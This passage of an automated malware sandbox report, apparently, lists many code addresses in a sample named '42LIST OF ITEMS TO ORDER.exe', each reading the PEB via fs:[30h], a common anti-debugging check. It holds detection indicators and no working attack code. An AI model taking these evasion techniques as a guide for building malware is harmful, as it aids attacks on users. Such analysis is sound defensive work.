Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F240A7 mov eax, dword ptr fs:[00000030h]3_2_00F240A7
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EA58BC mov eax, dword ptr fs:[00000030h]3_2_00EA58BC
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F32893 mov eax, dword ptr fs:[00000030h]3_2_00F32893
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ECE067 mov eax, dword ptr fs:[00000030h]3_2_00ECE067
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ECE067 mov eax, dword ptr fs:[00000030h]3_2_00ECE067
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F3F867 mov eax, dword ptr fs:[00000030h]3_2_00F3F867
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ECF076 mov eax, dword ptr fs:[00000030h]3_2_00ECF076
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ECF076 mov eax, dword ptr fs:[00000030h]3_2_00ECF076
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ECF076 mov eax, dword ptr fs:[00000030h]3_2_00ECF076
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ECF076 mov eax, dword ptr fs:[00000030h]3_2_00ECF076
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ECF076 mov eax, dword ptr fs:[00000030h]3_2_00ECF076
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED2870 mov eax, dword ptr fs:[00000030h]3_2_00ED2870
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EC2073 mov eax, dword ptr fs:[00000030h]3_2_00EC2073
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EDE845 mov eax, dword ptr fs:[00000030h]3_2_00EDE845
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F6A844 mov eax, dword ptr fs:[00000030h]3_2_00F6A844
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F6A844 mov eax, dword ptr fs:[00000030h]3_2_00F6A844
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EA9050 mov eax, dword ptr fs:[00000030h]3_2_00EA9050
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EBF050 mov eax, dword ptr fs:[00000030h]3_2_00EBF050
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EBF050 mov eax, dword ptr fs:[00000030h]3_2_00EBF050
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F5F83F mov eax, dword ptr fs:[00000030h]3_2_00F5F83F
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EA5020 mov eax, dword ptr fs:[00000030h]3_2_00EA5020
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EA5020 mov eax, dword ptr fs:[00000030h]3_2_00EA5020
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EA5020 mov eax, dword ptr fs:[00000030h]3_2_00EA5020
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED0021 mov eax, dword ptr fs:[00000030h]3_2_00ED0021
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED0021 mov eax, dword ptr fs:[00000030h]3_2_00ED0021
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED0021 mov eax, dword ptr fs:[00000030h]3_2_00ED0021
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED0021 mov eax, dword ptr fs:[00000030h]3_2_00ED0021
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EA7025 mov eax, dword ptr fs:[00000030h]3_2_00EA7025
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EA383B mov eax, dword ptr fs:[00000030h]3_2_00EA383B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EA383B mov eax, dword ptr fs:[00000030h]3_2_00EA383B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F25023 mov eax, dword ptr fs:[00000030h]3_2_00F25023
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F25023 mov eax, dword ptr fs:[00000030h]3_2_00F25023
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F25023 mov eax, dword ptr fs:[00000030h]3_2_00F25023
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F25023 mov eax, dword ptr fs:[00000030h]3_2_00F25023
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F25023 mov eax, dword ptr fs:[00000030h]3_2_00F25023
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F25023 mov eax, dword ptr fs:[00000030h]3_2_00F25023
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F25023 mov eax, dword ptr fs:[00000030h]3_2_00F25023
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F25023 mov eax, dword ptr fs:[00000030h]3_2_00F25023
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F25023 mov eax, dword ptr fs:[00000030h]3_2_00F25023
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EE4030 mov eax, dword ptr fs:[00000030h]3_2_00EE4030
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EC4800 mov eax, dword ptr fs:[00000030h]3_2_00EC4800
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EC4800 mov eax, dword ptr fs:[00000030h]3_2_00EC4800
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EC4800 mov eax, dword ptr fs:[00000030h]3_2_00EC4800
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EC4800 mov eax, dword ptr fs:[00000030h]3_2_00EC4800
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EBA01A mov eax, dword ptr fs:[00000030h]3_2_00EBA01A
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EBA01A mov eax, dword ptr fs:[00000030h]3_2_00EBA01A
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EBA01A mov eax, dword ptr fs:[00000030h]3_2_00EBA01A
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EBA01A mov eax, dword ptr fs:[00000030h]3_2_00EBA01A
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F61008 mov eax, dword ptr fs:[00000030h]3_2_00F61008
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EA51E0 mov eax, dword ptr fs:[00000030h]3_2_00EA51E0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EA51E0 mov ecx, dword ptr fs:[00000030h]3_2_00EA51E0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EA51E0 mov eax, dword ptr fs:[00000030h]3_2_00EA51E0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EA51E0 mov eax, dword ptr fs:[00000030h]3_2_00EA51E0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EB79F7 mov eax, dword ptr fs:[00000030h]3_2_00EB79F7
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F611D2 mov eax, dword ptr fs:[00000030h]3_2_00F611D2
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED69C0 mov ecx, dword ptr fs:[00000030h]3_2_00ED69C0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EE41D4 mov eax, dword ptr fs:[00000030h]3_2_00EE41D4
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EE41D4 mov eax, dword ptr fs:[00000030h]3_2_00EE41D4
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EE41D4 mov eax, dword ptr fs:[00000030h]3_2_00EE41D4
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EAA9A6 mov eax, dword ptr fs:[00000030h]3_2_00EAA9A6
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EAA9A6 mov eax, dword ptr fs:[00000030h]3_2_00EAA9A6
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED19B0 mov eax, dword ptr fs:[00000030h]3_2_00ED19B0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F27194 mov eax, dword ptr fs:[00000030h]3_2_00F27194
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F27194 mov eax, dword ptr fs:[00000030h]3_2_00F27194
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F27194 mov eax, dword ptr fs:[00000030h]3_2_00F27194
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EA516E mov eax, dword ptr fs:[00000030h]3_2_00EA516E
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EA516E mov ecx, dword ptr fs:[00000030h]3_2_00EA516E
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EA397E mov eax, dword ptr fs:[00000030h]3_2_00EA397E
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EA397E mov eax, dword ptr fs:[00000030h]3_2_00EA397E
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EAB171 mov eax, dword ptr fs:[00000030h]3_2_00EAB171
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EAB171 mov eax, dword ptr fs:[00000030h]3_2_00EAB171
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EAB171 mov eax, dword ptr fs:[00000030h]3_2_00EAB171
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED214F mov eax, dword ptr fs:[00000030h]3_2_00ED214F
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED594B mov eax, dword ptr fs:[00000030h]3_2_00ED594B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED594B mov eax, dword ptr fs:[00000030h]3_2_00ED594B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED594B mov eax, dword ptr fs:[00000030h]3_2_00ED594B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED594B mov eax, dword ptr fs:[00000030h]3_2_00ED594B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED594B mov eax, dword ptr fs:[00000030h]3_2_00ED594B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED594B mov eax, dword ptr fs:[00000030h]3_2_00ED594B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED594B mov eax, dword ptr fs:[00000030h]3_2_00ED594B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED594B mov eax, dword ptr fs:[00000030h]3_2_00ED594B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED594B mov eax, dword ptr fs:[00000030h]3_2_00ED594B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED594B mov eax, dword ptr fs:[00000030h]3_2_00ED594B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED594B mov eax, dword ptr fs:[00000030h]3_2_00ED594B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED594B mov eax, dword ptr fs:[00000030h]3_2_00ED594B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED594B mov eax, dword ptr fs:[00000030h]3_2_00ED594B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED594B mov eax, dword ptr fs:[00000030h]3_2_00ED594B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED594B mov eax, dword ptr fs:[00000030h]3_2_00ED594B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED594B mov eax, dword ptr fs:[00000030h]3_2_00ED594B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED594B mov eax, dword ptr fs:[00000030h]3_2_00ED594B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED594B mov eax, dword ptr fs:[00000030h]3_2_00ED594B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED594B mov eax, dword ptr fs:[00000030h]3_2_00ED594B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED594B mov eax, dword ptr fs:[00000030h]3_2_00ED594B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED594B mov eax, dword ptr fs:[00000030h]3_2_00ED594B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F61151 mov eax, dword ptr fs:[00000030h]3_2_00F61151
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EA3158 mov ecx, dword ptr fs:[00000030h]3_2_00EA3158
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EDA93B mov eax, dword ptr fs:[00000030h]3_2_00EDA93B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EAB101 mov eax, dword ptr fs:[00000030h]3_2_00EAB101
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EAB101 mov eax, dword ptr fs:[00000030h]3_2_00EAB101
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EA4101 mov eax, dword ptr fs:[00000030h]3_2_00EA4101
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EA4101 mov eax, dword ptr fs:[00000030h]3_2_00EA4101
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EA4101 mov eax, dword ptr fs:[00000030h]3_2_00EA4101
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EBF11B mov eax, dword ptr fs:[00000030h]3_2_00EBF11B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EBF11B mov eax, dword ptr fs:[00000030h]3_2_00EBF11B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EBF11B mov eax, dword ptr fs:[00000030h]3_2_00EBF11B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EBF11B mov eax, dword ptr fs:[00000030h]3_2_00EBF11B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EBF11B mov eax, dword ptr fs:[00000030h]3_2_00EBF11B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EBF11B mov eax, dword ptr fs:[00000030h]3_2_00EBF11B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EBF11B mov eax, dword ptr fs:[00000030h]3_2_00EBF11B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F7010D mov eax, dword ptr fs:[00000030h]3_2_00F7010D
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F7010D mov eax, dword ptr fs:[00000030h]3_2_00F7010D
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED7110 mov eax, dword ptr fs:[00000030h]